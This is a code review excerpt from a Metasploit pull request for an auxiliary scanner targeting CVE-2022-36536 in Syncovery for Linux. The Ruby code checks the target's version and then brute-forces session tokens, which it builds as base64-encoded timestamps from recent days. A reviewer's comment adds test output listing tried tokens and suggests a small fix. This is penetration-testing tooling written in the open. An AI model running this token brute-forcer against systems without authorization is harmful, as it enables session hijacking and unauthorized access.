modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb

```diff
@@ -0,0 +1,153 @@
+        OptString.new('TARGETURI', [false, 'The path to Syncovery', '/'])
+      ]
+    )
+
+    deregister_options(
+      'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',
+      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',
+      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername', 'PASSWORD_SPRAY', 'BLANK_PASSWORDS',
+      'USER_FILE', 'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+
+    if res && res.code == 200
+      json_res = res.get_json_document
+      if json_res['isSyncoveryWindows'] == 'false'
+        version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
+        if version.empty?
+          vprint_warning("#{peer} - Could not identify version")
+          Exploit::CheckCode::Detected
+        elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')
+          vprint_good("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Appears
+        else
+          vprint_status("#{peer} - Syncovery #{version}")
+          Exploit::CheckCode::Safe
+        end
+      else
+        Exploit::CheckCode::Safe
+      end
+    else
+      Exploit::Unknown
+    end
+  end
+
+  def run_host(ip)
+    # Calculate dates
+    days = datastore['DAYS']
+    if days < 0
+      days = 0
+    end
+    dates = []
+    (0..days).each do |day|
+      dates << (Date.today - day).strftime('%m/%d/%Y')
+    end
+    time = DateTime.now.strftime('%H:%M:%S')
+    hrs, min, sec = time.split(':')
+
+    # Create possible session tokens
+    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new
+    dates.each do |date|
+      (0..hrs.to_i).reverse_each do |hours|
+        (0..min.to_i).reverse_each do |minutes|
+          (0..sec.to_i).reverse_each do |seconds|
+            timestamp = "#{date} #{format('%.2d', hours)}:#{format('%.2d', minutes)}:#{format('%.2d', seconds)}"
+            cred_collection.add_private(Base64.strict_encode64(timestamp).strip)
+          end
+          sec = 59
+        end
+        min = 59
+      end
+      hrs = 23
+    end
+
+    print_status("#{peer.strip} - Starting Brute-Forcer")
+    scanner = Metasploit::Framework::LoginScanner::SyncoveryFileSyncBackup.new(
+      host: ip,
+      port: rport,
+      cred_details: cred_collection,
+      stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
+      connection_timeout: 10
+    )
+
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
```

Comment:
Apparently, `:service_name` is also required. I had this error while testing:
```
...
[-] 192.168.22.34:8999 - INVALID TOKEN: MTIvMTIvMjAyMiAxOTozOToxOQ==
[-] 192.168.22.34:8999 - INVALID TOKEN: MTIvMTIvMjAyMiAxOTozOToxOA==
[-] 192.168.22.34:8999 - INVALID TOKEN: MTIvMTIvMjAyMiAxOTozOToxNw==
[-] 192.168.22.34:8999 - INVALID TOKEN: MTIvMTIvMjAyMiAxOTozOToxNg==
[*] Error: 192.168.22.34: KeyError key not found: :service_name
```
```suggestion
        workspace_id: myworkspace_id,
        service_name: 'http'
```